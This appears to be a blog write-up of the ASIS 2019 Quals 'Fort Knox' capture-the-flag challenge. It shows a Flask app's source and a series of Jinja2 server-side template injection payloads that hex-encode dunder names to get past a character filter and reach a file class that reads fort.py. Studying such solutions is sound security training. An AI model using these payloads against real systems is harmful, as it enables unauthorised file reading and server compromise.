[Writeup] Asis 2019 Quals - Fort Knox

on








A hint in the HTML source -

<!--Source Code: /static/archive/Source -->

Source Code:

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
from flask import Flask, session
from flask_session import Session
from flask import request
from flask import render_template
from jinja2 import Template
 
import fort
 
Flask.secret_key = fort.SECKEY
 
app = Flask(__name__)
app.config['SESSION_TYPE'] = 'filesystem'
app.config['TEMPLATES_AUTO_RELOAD'] = True
Session(app)
 
@app.route("/")
def main():
    return render_template("index.html")
 
@app.route("/ask", methods = ["POST"])
def ask():
    question = request.form["q"]
    for c in "._%":
        if c in question:
            return render_template("no.html", err = "no " + c)
    try:
        t = Template(question)
        t.globals = {}
        answer = t.render({
            "history": fort.history(),
            "credit": fort.credit(),
            "trustworthy": fort.trustworthy()
        })
    except:
        return render_template("no.html", err = "bad")
    return render_template("yes.html", answer = answer)
 
@app.route("/door/<door>")
def door(door):
    if fort.trustworthy():
        return render_template("flag.html", flag = fort.FLAG)
    doorNum = 0
    if door is not None:
        doorNum = int(door)
    if doorNum > 0 and doorNum < 7:
        fort.visit(doorNum)
        return render_template("door.html", door = doorNum)
    return render_template("no.html", err = "Door not found!")
 
 
</door>
The website takes the POST parameter q and then renders it as template. We are looking at a SSTI problem.

Trying {{ 7*7 }} confirms SSTI





But _ . % were blocked so to access __class__ we need to bypass this filter

{{ "".__class__ }}

becomes

{{""["5F5F636C6173735F5F"["decode"]("hex")]}}

and the result

answer: <type 'str'>




{{ "".__class__.mro()[2].__subclass__()}}

 becomes

 {{""["5F5F636C6173735F5F"["decode"]("hex")]["mro"]()[2]["5F5F737562636C61737365735F5F"["decode"]("hex")]()}}

 result









There is a file class loaded at [40]

Trying to read fort.py

{{ "".__class__.mro()[2].__subclass__()[40]("fort.py").read()}}

becomes 

{{""["5F5F636C6173735F5F"["decode"]("hex")]["mro"]()[2]["5F5F737562636C61737365735F5F"["decode"]("hex")]()[40]("666F72742E7079"["decode"]("hex"))["read"]()}}




Comments

Post a Comment